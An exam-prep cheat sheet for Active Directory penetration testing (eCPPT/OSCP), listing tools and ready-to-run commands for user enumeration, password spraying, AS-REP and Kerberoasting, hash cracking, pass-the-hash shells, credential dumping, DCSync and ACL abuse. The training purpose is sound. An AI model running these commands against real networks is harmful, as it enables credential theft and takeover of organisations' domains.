AD Tools Reference — What Each Tool Does and Where It Works

Quick reference for every AD tool you need. Organized by what they DO, not by name. Each tool lists: what it does, when to use it, eCPPT available?, OSCP available?


FINDING USERNAMES (Phase 1 — no creds needed)

nxc (NetExec / CrackMapExec)

  • What it does: Swiss army knife for AD. Talks to SMB, LDAP, WinRM. Enumerate users, shares, groups. Spray passwords. Check where creds work. Dump hashes.
  • When to use: Almost every phase of the chain. Your go-to tool.
  • eCPPT: YES (confirmed by multiple reviewers)
  • OSCP: YES
  • Key commands:
nxc smb <IP> -u '' -p '' --users           # Enumerate users (null session)
nxc smb <IP> -u '' -p '' --shares           # List shares (null session)
nxc smb <IP> -u '' -p '' --rid-brute        # Find users by brute-forcing RIDs
nxc smb <IP> -u 'USER' -p 'PASS' --users   # Enumerate users (with creds)
nxc smb <IP> -u 'USER' -p 'PASS' --shares  # List shares (with creds)
nxc smb <IP> -u users.txt -p 'Password1!' --continue-on-success  # Password spray
nxc smb <SUBNET>/24 -u 'USER' -p 'PASS'    # Check where creds work (Pwn3d! = admin)
nxc smb <IP> -u 'USER' -p 'PASS' --sam     # Dump local hashes
nxc smb <IP> -u 'USER' -p 'PASS' --lsa     # Dump LSA secrets
nxc winrm <IP> -u 'USER' -p 'PASS'         # Check if WinRM access works

kerbrute

  • What it does: Checks if usernames are valid by asking Kerberos. DC responds differently for valid vs invalid users.
  • When to use: Phase 1 — finding valid usernames when SMB null sessions are blocked.
  • eCPPT: YES (confirmed pre-installed on exam Kali)
  • OSCP: YES (you download it yourself)
  • Install (not an apt package!):
# If you have Go installed (check: which go)
go install github.com/ropnop/kerbrute@latest
sudo cp ~/go/bin/kerbrute /usr/local/bin/kerbrute
sudo chmod +x /usr/local/bin/kerbrute

# If no ARM64 binary available (Apple Silicon), must build from source with Go
  • Key command:
kerbrute userenum -d <DOMAIN> --dc <DC_IP> userlist.txt
  • Wordlist priority order (fastest to slowest):
# 1. FIRST — small, fast, covers most real AD environments (~10k names)
/usr/share/seclists/Usernames/Names/names.txt

# 2. Tiny — just common service accounts
/usr/share/seclists/Usernames/top-usernames-shortlist.txt

# 3. Good balance — 10k usernames
/usr/share/seclists/Usernames/xato-net-10-million-usernames-10000.txt

# 4. LAST RESORT — 10 million entries, takes hours
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
  • ⚠️ WARNING: Never start with xato-net-10-million-usernames.txt — it takes hours. Start with names.txt, it covers most boxes in seconds.

rpcclient

  • What it does: Talks directly to Windows RPC. Can enumerate users, groups, and more with null sessions.
  • When to use: Phase 1 — backup for nxc if it doesn’t work.
  • eCPPT: YES (pre-installed on Kali)
  • OSCP: YES
  • Key command:
rpcclient -U '' -N <DC_IP> -c 'enumdomusers'
rpcclient -U '' -N <DC_IP> -c 'enumdomgroups'

enum4linux

  • What it does: Automated SMB/RPC enumeration script. Runs multiple enumeration queries at once.
  • When to use: Phase 1 — quick automated scan for users, shares, groups.
  • eCPPT: YES (pre-installed on Kali)
  • OSCP: YES
  • Key command:
enum4linux -U <DC_IP>          # Users
enum4linux -a <DC_IP>          # Everything

ldapsearch

  • What it does: Queries LDAP directory directly. Can find users, groups, descriptions, and other AD attributes.
  • When to use: Phase 1 — when you need specific AD attributes, or for anonymous LDAP queries.
  • eCPPT: YES (pre-installed on Kali)
  • OSCP: YES
  • Key command:
ldapsearch -x -H ldap://<DC_IP> -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

GETTING HASHES WITHOUT CREDS (Phase 2-3)

impacket-GetNPUsers (AS-REP Roasting)

  • What it does: Finds accounts with “Do not require Kerberos pre-authentication” and gets their hash WITHOUT needing a password.
  • When to use: Phase 2 — FIRST attack after finding usernames. Before any brute-forcing.
  • eCPPT: YES (available)
  • OSCP: YES
  • Why it works: Accounts with pre-auth disabled let the DC hand you a hash for free.
  • Key command:
impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile valid_users.txt -format hashcat -outputfile asrep.txt
  • Hashcat mode: 18200
  • John: john asrep.txt --wordlist=rockyou.txt

GETTING HASHES WITH CREDS (Phase 7)

impacket-GetUserSPNs (Kerberoasting)

  • What it does: Requests service tickets for accounts with SPNs. The ticket is encrypted with the service account’s password — crack it offline.
  • When to use: Phase 7 — AFTER getting first creds. Any authenticated user can do this.
  • eCPPT: YES
  • OSCP: YES
  • Why it works: Any domain user can request a service ticket. The DC encrypts it with the service account’s password hash.
  • Key command:
impacket-GetUserSPNs <DOMAIN>/'USER':'PASS' -dc-ip <DC_IP> -request -outputfile kerberoast.txt
  • Hashcat mode: 13100
  • John: john kerberoast.txt --wordlist=rockyou.txt

AS-REP vs Kerberoasting — How to Remember

AS-REP RoastingKerberoasting
Needs creds?NOYES
TargetUsers with “no preauth”Service accounts with SPNs
Impacket toolGetNPUsersGetUserSPNs
Hashcat mode1820013100
When in chainPhase 2 (before creds)Phase 7 (after creds)

CRACKING HASHES

hashcat

  • What it does: Cracks password hashes using GPU (or CPU). Fast but sometimes buggy.
  • eCPPT: YES (but known to have issues — always have john as backup)
  • OSCP: YES
  • Key commands:
hashcat -m 18200 asrep.txt wordlist.txt      # AS-REP hashes
hashcat -m 13100 kerberoast.txt wordlist.txt  # Kerberos TGS hashes
hashcat -m 5600 ntlmv2.txt wordlist.txt       # NTLMv2 hashes
hashcat -m 1000 ntlm.txt wordlist.txt         # NTLM hashes

john (John the Ripper)

  • eCPPT: YES
  • OSCP: YES
  • Key commands:
john hash.txt --wordlist=rockyou.txt          # Crack with wordlist
john hash.txt --show                          # Show cracked passwords

MAPPING THE DOMAIN (Phase 6)

bloodhound-python

  • What it does: Collects all AD data (users, groups, permissions, computers) from Kali. Creates JSON files for BloodHound GUI.
  • When to use: Phase 6 — IMMEDIATELY after getting first creds.
  • eCPPT: YES (available on Kali)
  • OSCP: YES
  • Key command:
bloodhound-python -u 'USER' -p 'PASS' -ns <DC_IP> -d <DOMAIN> -c All

BloodHound GUI (Community Edition)

  • What it does: Visualizes AD data and shows attack paths to Domain Admin.
  • When to use: After collecting data with bloodhound-python. Upload JSON files, search for your user, use PATHFINDING.
  • eCPPT: YES (pre-installed on exam Kali)
  • OSCP: YES
  • Key actions:
    • Upload JSON files (drag and drop)
    • Search for your user → right-click → Mark as Owned
    • PATHFINDING: start = your user, end = Domain Admins
    • Click edges between nodes to see relationship type and abuse instructions

GETTING SHELLS (Phase 8)

evil-winrm

  • What it does: Connects to Windows via WinRM (port 5985). Gives interactive PowerShell shell. Best for uploading/downloading files.
  • When to use: When port 5985 is open and you have valid creds.
  • eCPPT: YES (but known broken — use Docker workaround: docker run --rm -ti oscarakaelvis/evil-winrm)
  • OSCP: YES
  • Key commands:
evil-winrm -i <IP> -u 'USER' -p 'PASS'
evil-winrm -i <IP> -u 'USER' -H '<NTLM_HASH>'    # Pass-the-Hash

impacket-psexec

  • What it does: Creates a service on the target via SMB, gives you a SYSTEM shell. Noisy but effective.
  • When to use: When you have admin creds and need a SYSTEM shell.
  • eCPPT: YES
  • OSCP: YES
  • Key commands:
impacket-psexec '<DOMAIN>/<USER>:<PASS>'@<IP>
impacket-psexec '<DOMAIN>/<USER>'@<IP> -hashes :<NTLM_HASH>    # Pass-the-Hash

impacket-wmiexec

  • What it does: Similar to psexec but stealthier. Uses WMI instead of creating a service.
  • When to use: When psexec doesn’t work or you want less noise.
  • eCPPT: YES
  • OSCP: YES
  • Key command:
impacket-wmiexec '<DOMAIN>/<USER>:<PASS>'@<IP>

xfreerdp

  • What it does: RDP client. Gives you a full graphical desktop.
  • When to use: When port 3389 is open, or when you need GUI access.
  • eCPPT: YES
  • OSCP: YES
  • Key command:
xfreerdp /u:'USER' /p:'PASS' /v:<IP> /cert-ignore

DUMPING CREDENTIALS (Phase 9)

impacket-secretsdump

  • What it does: Dumps all hashes from a machine (SAM, LSA, NTDS.dit). Also does DCSync attacks to pull every hash in the domain.
  • When to use: Phase 9 — on every machine you compromise. Phase 10 — DCSync when you have DA or DCSync rights.
  • eCPPT: YES
  • OSCP: YES
  • Key commands:
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<IP>              # Dump everything
impacket-secretsdump '<DOMAIN>/<USER>'@<IP> -hashes :<HASH>    # With hash
impacket-secretsdump -just-dc-ntlm '<DOMAIN>/<USER>:<PASS>'@<DC_IP>  # DC only — all domain hashes

Meterpreter + Kiwi (Metasploit)

  • What it does: Built-in credential dumper in Metasploit. Loads the Kiwi extension (Mimikatz) to dump hashes, passwords, tickets.
  • When to use: When you have a Meterpreter shell on a compromised machine.
  • eCPPT: YES — UNRESTRICTED (use on every machine!)
  • OSCP: LIMITED — only one machine
  • Key commands:
meterpreter> load kiwi
meterpreter> creds_all            # All credentials in memory
meterpreter> lsa_dump_sam         # Local account hashes
meterpreter> lsa_dump_secrets     # Service account passwords
meterpreter> hashdump             # Quick NTLM hash dump

MODIFYING AD OBJECTS (ACL Abuse)

net rpc

  • What it does: Modifies AD groups and user passwords remotely from Kali. Built-in Linux command.
  • When to use: When BloodHound shows GenericAll over a group (add yourself) or ForceChangePassword over a user.
  • eCPPT: YES (built into Linux/Kali)
  • OSCP: YES
  • Key commands:
# Add user to a group
net rpc group addmem "GROUP_NAME" "USERNAME" -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>

# Change a user's password
net rpc password "TARGET_USER" "NewP@ss123!" -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>

impacket-dacledit

  • What it does: Modifies permissions (ACLs/DACLs) on AD objects. Can grant DCSync rights.
  • When to use: When BloodHound shows WriteDACL over the domain.
  • eCPPT: May or may not be on exam Kali (newer tool)
  • OSCP: May or may not be available
  • Key command:
impacket-dacledit -action 'write' -rights 'DCSync' -principal 'USER' '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP>
  • Alternative if not available: Use PowerView from a Windows shell or evil-winrm

CRITICAL REMINDERS FOR EXAMS

eCPPT Specific:

  • Metasploit is FULLY UNRESTRICTED — use it on everything
  • Use Desktop wordlists in order: common_corporate_passwords.lst → seasons.txt → months.txt → xato-10k → rockyou
  • Evil-WinRM may be broken — use Docker workaround
  • hashcat may be buggy — use john as backup
  • No internet access — only pre-installed tools
  • Always use single quotes when saving hashes: echo ‘$hash’ > file.txt

OSCP Specific:

  • Metasploit limited to ONE machine
  • Must write a report
  • AI/LLM usage prohibited
  • Proctored exam

Both Exams:

  • Every new credential → spray it immediately across all machines
  • Dump creds on EVERY machine you compromise
  • Track all creds in a table: username | password/hash | source | where it works